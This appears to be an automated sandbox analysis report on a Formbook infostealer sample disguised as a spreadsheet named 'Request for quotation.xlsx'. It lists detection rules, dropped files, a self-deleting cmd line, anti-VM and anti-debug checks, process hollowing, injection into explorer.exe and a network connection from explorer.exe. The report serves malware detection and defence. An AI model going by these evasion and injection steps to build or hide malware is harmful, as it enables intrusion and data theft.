          Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@13/3@2/2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A563185 GetDiskFreeSpaceExW,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Request for quotation.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR1F71.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Request for quotation.xlsxVirustotal: Detection: 33%
          Source: Request for quotation.xlsxReversingLabs: Detection: 22%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: Request for quotation.xlsxStatic file information: File size 2205696 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: cmd.pdb,$ source: vbc.exe, 00000007.00000003.2278081880.000000000093C000.00000004.00000001.sdmp
          Source: Binary string: cmd.pdb,$WJ6$WJ@$WJ source: vbc.exe, 00000007.00000003.2278106711.000000000097A000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, cmd.exe
          Source: Binary string: cmd.pdb source: vbc.exe, 00000007.00000003.2278106711.000000000097A000.00000004.00000001.sdmp, cmd.exe
          Source: Request for quotation.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Request for quotation.xlsxInitial sample: OLE indicators encrypted = True
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A56D539 LoadLibraryW,GetProcAddress,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041797C push ecx; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00417936 push esp; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0040E3E7 push ebp; iretd
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00417C0D push ss; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041CEB5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041CF6C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041CF02 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041CF0B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041D7C6 push cs; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041678C push 00000050h; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A5513B6 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0229DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0008E3E7 push ebp; iretd
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0009678C push 00000050h; retf
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0009D7C6 push cs; retf
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00097936 push esp; retf
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0009797C push ecx; retf
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00097C0D push ss; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0009CEB5 push eax; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0009CF0B push eax; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0009CF02 push eax; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0009CF6C push eax; ret
          Source: winlog[1].exe.2.dr, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: winlog[1].exe.2.dr, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: vbc.exe.2.dr, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: vbc.exe.2.dr, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 4.2.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 4.2.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 4.0.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 4.0.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 5.0.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 5.0.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 5.2.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 5.2.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 6.0.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 6.0.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 6.2.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 6.2.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 7.0.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 7.0.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 7.2.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 7.2.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE5
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: Request for quotation.xlsxStream path 'EncryptedPackage' entropy: 7.99990143991 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2924, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLHEADKCREATEOBJECT("WSCRIPT.SHELL").RUN """
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00409A90 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2400Thread sleep time: -420000s >= -30000s
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2400Thread sleep time: -60000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2912Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1928Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A556E47 GetFileAttributesW,FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A552E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A570202 FindFirstFileW,GetFullPathNameW,RemoveDirectoryW,RemoveDirectoryW,GetLastError,GetLastError,GetFileAttributesW,SetFileAttributesW,RemoveDirectoryW,GetLastError,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A56BF0C FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55BBA4 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,FindNextFileW,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A570492 FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetLastError,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,FindNextFileW,FindClose,
          Source: explorer.exe, 00000008.00000000.2251278805.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.2257941915.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: vbc.exe, 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000008.00000000.2257823360.00000000041AD000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: explorer.exe, 00000008.00000000.2251408426.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00409A90 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0040ACD0 LdrLoadDll,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A56D539 LoadLibraryW,GetProcAddress,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A20080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A200EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02280080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022800EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022A26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A552E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A5513A9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A557C63 SetUnhandledExceptionFilter,
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.181.41 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 4A550000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
